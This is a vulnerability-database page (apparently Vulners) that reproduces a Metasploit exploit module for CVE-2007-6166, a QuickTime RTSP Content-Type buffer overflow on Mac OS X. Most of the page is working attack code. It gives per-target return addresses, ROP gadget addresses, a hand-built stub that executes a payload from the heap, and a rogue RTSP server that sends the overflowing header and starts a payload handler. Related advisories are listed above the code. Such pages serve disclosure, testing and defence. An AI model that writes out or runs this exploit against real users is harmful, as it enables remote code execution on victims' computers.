Vulners
Lucene search
Apple QuickTime (Mac OSX) - RTSP Content-Type Overflow (Metasploit)
| Reporter | Title | Published | Views | Family All 26 |
|---|---|---|---|---|
 | QuickTime < 7.3.1 Multiple Vulnerabilities | 14 Dec 200700:00 | – | nessus |
| GLSA-200803-08 : Win32 binary codecs: Multiple vulnerabilities | 7 Mar 200800:00 | – | nessus |
| QuickTime < 7.3.1 Multiple Vulnerabilities (Mac OS X) | 14 Dec 200700:00 | – | nessus |
| QuickTime < 7.3.1 Multiple Vulnerabilities (Windows) | 14 Dec 200700:00 | – | nessus |
 | CVE-2007-6166 | 6 Jul 200800:00 | – | circl |
 | Apple QuickTime RTSP Response Crafted Content-Type Header Buffer Overflow (CVE-2007-6166) | 27 Nov 200700:00 | – | checkpoint_advisories |
 | CVE-2007-6166 | 29 Nov 200701:00 | – | cve |
 | CVE-2007-6166 | 29 Nov 200701:00 | – | cvelist |
 | Apple QuickTime 7.3 - RTSP Response Header Buffer Overflow (Metasploit) | 9 May 201000:00 | – | exploitdb |
 | Win32 binary codecs: Multiple vulnerabilities | 4 Mar 200800:00 | – | gentoo |
10
##
# $Id: quicktime_rtsp_content_type.rb 10617 2010-10-09 06:55:52Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'MacOS X QuickTime RTSP Content-Type Overflow',
# Description?
# Author?
'Version' => '$Revision: 10617 $',
'Platform' => 'osx',
'References' =>
[
[ 'CVE', '2007-6166' ],
[ 'OSVDB', '40876'],
[ 'BID', '26549' ],
],
'Payload' =>
{
'Space' => 3841,
'BadChars' => "\x00\x0a\x0d",
'MaxNops' => 0,
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Mac OS X 10.4.0 PowerPC, QuickTime 7.0.0',
{
'Arch' => ARCH_PPC,
'Ret' => 0x8fe3f88c,
'RetOffset' => 551,
'PayloadOffset' => 879
}
],
[ 'Mac OS X 10.5.0 PowerPC, QuickTime 7.2.1',
{
'Arch' => ARCH_PPC,
'Ret' => 0x8fe042e0,
'RetOffset' => 615,
'PayloadOffset' => 3351
}
],
[ 'Mac OS X 10.4.8 x86, QuickTime 7.1.3',
{
'Arch' => ARCH_X86,
'Offset' => 307,
'Writable' => 0xa0bd0f10, # libSystem __IMPORT
# The rest of these are all in libSystem __TEXT
'ret' => 0x9015d336,
'poppopret' => 0x9015d334,
'setjmp' => 0x900bc438,
'strdup' => 0x90012f40,
'jmp_eax' => 0x9014a77f
}
],
[ 'Mac OS X 10.5.0 x86, QuickTime 7.2.1',
{
'Arch' => ARCH_X86,
'Offset' => 307,
'Writable' => 0x8fe66448, # dyld __IMPORT
# The rest of these addresses are in dyld __TEXT
'ret' => 0x8fe1ceee,
'poppopret' => 0x8fe220d7,
'setjmp' => 0x8fe1ceb0,
'strdup' => 0x8fe1cd77,
'jmp_eax' => 0x8fe01041
}
],
],
'DefaultTarget' => 2,
'DisclosureDate' => 'Nov 23 2007'))
end
######
# XXX: This does not work on Tiger apparently
def make_exec_payload_from_heap_stub()
frag0 =
"\x90" + # nop
"\x58" + # pop eax
"\x61" + # popa
"\xc3" # ret
frag1 =
"\x90" + # nop
"\x58" + # pop eax
"\x89\xe0" + # mov eax, esp
"\x83\xc0\x0c" + # add eax, byte +0xc
"\x89\x44\x24\x08" + # mov [esp+0x8], eax
"\xc3" # ret
setjmp = target['setjmp']
writable = target['Writable']
strdup = target['strdup']
jmp_eax = target['jmp_eax']
exec_payload_from_heap_stub =
frag0 +
[setjmp].pack('V') +
[writable + 32, writable].pack("V2") +
frag1 +
"X" * 20 +
[setjmp].pack('V') +
[writable + 24, writable, strdup, jmp_eax].pack("V4") +
"X" * 4
end
def on_client_connect(client)
print_status("Got client connection...")
if (target['Arch'] == ARCH_PPC)
ret_offset = target['RetOffset']
payload_offset = target['PayloadOffset']
# Create pattern sized up to payload, since it always follows
# the return address.
boom = Rex::Text.pattern_create(payload_offset)
boom[ret_offset, 4] = [target['Ret']].pack('N')
boom[payload_offset, payload.encoded.length] = payload.encoded
else
boom = Rex::Text.pattern_create(327)
boom[307, 4] = [target['ret']].pack('V')
boom[311, 4] = [target['ret']].pack('V')
boom[315, 4] = [target['poppopret']].pack('V')
boom[319, 4] = [target['Writable']].pack('V')
boom[323, 4] = [target['Writable']].pack('V')
#
# Create exec-payload-from-heap-stub, but split it in two.
# The first word must be placed as the overwritten saved ebp
# in the attack string. The rest is placed after the
# Writable memory addresses.
#
magic = make_exec_payload_from_heap_stub()
boom[303, 4] = magic[0, 4]
boom += magic[4..-1]
#
# Place the payload immediately after the stub as it expects
#
boom += payload.encoded
end
body = " "
header =
"RTSP/1.0 200 OK\r\n"+
"CSeq: 1\r\n"+
"Content-Type: #{boom}\r\n"+
"Content-Length: #{body.length}\r\n\r\n"
print_status("Sending RTSP response...")
client.put(header + body)
print_status("Sleeping...")
select(nil,nil,nil,1)
print_status("Starting handler...")
handler(client)
print_status("Closing client...")
service.close_client(client)
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Oct 2010 00:00Current
6.6Medium risk
Vulners AI Score6.6
CVSS 29.3
EPSS0.84254